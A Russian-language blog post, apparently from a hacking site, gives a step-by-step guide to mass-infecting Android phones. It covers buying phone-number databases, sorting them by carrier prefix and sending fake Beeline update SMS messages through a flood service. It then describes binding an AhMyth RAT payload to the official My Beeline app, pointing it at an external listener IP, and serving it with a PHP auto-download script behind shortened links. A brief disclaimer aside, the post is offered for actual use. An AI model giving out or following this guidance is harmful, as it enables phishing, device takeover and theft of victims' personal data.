Как подменять оригинальные программы на Android

Как бороться со страхом в трейдинге
Как бороться со страхом в трейдинге
Сентябрь 7, 2019
Вышел публичный эксплоит на уязвимость BlueKeep (CVE-2019-0708)
Вышел публичный эксплоит на уязвимость BlueKeep (CVE-2019-0708)
Сентябрь 8, 2019
Показать все
Как подменять оригинальные программы на Android

Приветствую читателей данного сайта. Решил поднять и поковыряться в теме, о массовом взломе. Согласен, тема не простая, но крайне интересная. Не будем тянуть кота за бубенчики, а сразу начнем!

Давайте сразу обговорим план наших действий:

Автор и создатели данного сайта не несут никакой ответственности за использование ресурсов доступных в этой статье.

Вся информация дана исключительно в информационных целях.

Например, есть такая ситуация. Все знают, что операторы сотовой связи (Tele2, MTC, Beeline и тд.) занимаются рассылкой смс на номера своих абонентов. Эти  сообщения бывают разного характера, от уведомления о низком балансе или банальной рекламой. Бывало 🙂 ? Воспользовавшись таким случаем, жертве придет сообщение от нас. В нем мы укажем, о чем то, связанным с программой или приложением от разработчика сотовой связи. Как это реализовать на практике я покажу в примере, далее. А доверчивый пользователь будет его скачивать. Именно в этот момент и начинается само «веселье». Он конечно же не обнаружит наш вирус, попросту данные жертвы, будут уже принадлежать не ему самому.

А сейчас обсудим действия на стороне хакера.

Самое первое, что нужно сделать, это добыть базу телефонных номеров. В принципе ее не сложно найти на тематических форумах, погуглите и у вас все получится.

Для определения оператора связи нужного для нас, мы будем смотреть первые цифры номера: например +79101231212 (после +7 идет код оператора связи)

В таком диапазоне:

Beeline (903 — 909) (960 — 976)

Tele 2 (900, 901, 902, 904, 908, 950, 951, 952, 953, 958, 991 — 999)

Mегафон (920 — 928) (929 — 937)

МТС (910 — 919) (980 — 989)

Если кто не понял, поясню. Берем базу номеров и ищем оператора по диапазону. Например, после +7 стоит 902 это номер сотового оператора Tele2. Думаю объяснил понятно.

Дальше, нам потребуется сделать рассылку по номерам, что-то вроде этого:

Добрый день уважаемый пользователь! Команда Билайн благодарит вас за то, что вы выбрали нас! Спешим сообщить вам, что создали новую, обновленную версию приложения Билайн. Теперь оно стало еще удобнее и быстрее. Протестировать его вы можете здесь (ваша ссылка)

Я привел пример на операторе Билайн, но вы можете изменить его на любое свое название. Дальше открывает сервис (не реклама)

смс флуд

Сервис предлагает услуги по подмене номеров, но мы воспользуемся рассылкой сообщений. Описывать, что к сему не буду, сложного ничего нет, разберетесь. Проходим регистрацию и выбираем «Аккаунт для флуда» (услуга платная). Качаете прогу, но что бы получить пароль к архиву, нужно поработать, думаю, вы справитесь. Начнем создавать вирус, покажу на примере Windows, юзать мы будем программу AhMyth RAT.

Скачиваем и запускаем. Первая вкладка Victims, прописываем port 42474 (но это не обязательно) и жмем Listen. Далее открываем вторую APK Builder и в Source IP пишем наш IP адрес. IP должен быть внешний, не локальный. Узнать можно на сайте 2ip.ru или whoer.net, эти сайты хорошо себе зарекомендовали, пользуйтесь. После всех проделанных действий, нужно слепить вирус и прогу в единое целое. Возьмем официальное приложение, например My Beeline. Скачиваем себе apk файл на комп и клацаем Bind With Another Apk. Потом там находим нашу софтину и склеиваем и вирусом. Иногда возникают проблемы с прогой, в случае если AhMyth Rat отказывается работать, то как правило причина в не обновленной или отсутствующей Java. Решение простое, переходим на сайт и качаем. Переустанавливаем софт и проделываем все действия снова. Следующим шагом будет поиск хостинга, кто не хочет платить, прошу сюда, юзайте бесплатную версию. Создаем авто загрузку файлика на телефон жертвы. Как сделать? Да все легко и просто. Создаем новый файл php, открываете его через текстовый редактор, пишем:

<?php 
header("Content-disposition: attachment; filename=названия файла.apk");
header("Content-type: application/octet-stream"); 
header("Content-Description: File Transfer"); 
readfile("путь к файлу"); 
?>

Заливаем на сайт, если не выходит, залейте сам вирус на сайт, с указанием в readifile ссылку, путь к файлу, что находится на сайте (https://путь к файлу/). Осталось лишь распространить наш файл-вирус.

Первое, что мы делаем, сокращаем ссылку с автозагрузкой. Парочка сайтов для этого дела (gmy.su, qps.ru, qil.su). Пользуйтесь любым, потом получившуюся ссылку вставляете в смс для спама, в сервисе, что я привел выше.

В принципе все, таким простым способом можно взломать кучу смартфонов. Нельзя назвать данный способ сложным, но и легким он не является. Тут все зависит от пользователя, насколько он доверчив, что бы верить в такого рода сообщения!

0

Автор публикации

не в сети 1 неделя

Александр Никитюк

14
Комментарии: 11Публикации: 151Регистрация: 17-05-2019
ПОДЕЛИСЬ С ДРУЗЬЯМИ

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *

12 − 10 =

Авторизация
*
*

двенадцать + 10 =

Регистрация
*
*
*
Пароль не введен
*

двенадцать − шесть =

Генерация пароля

два × 4 =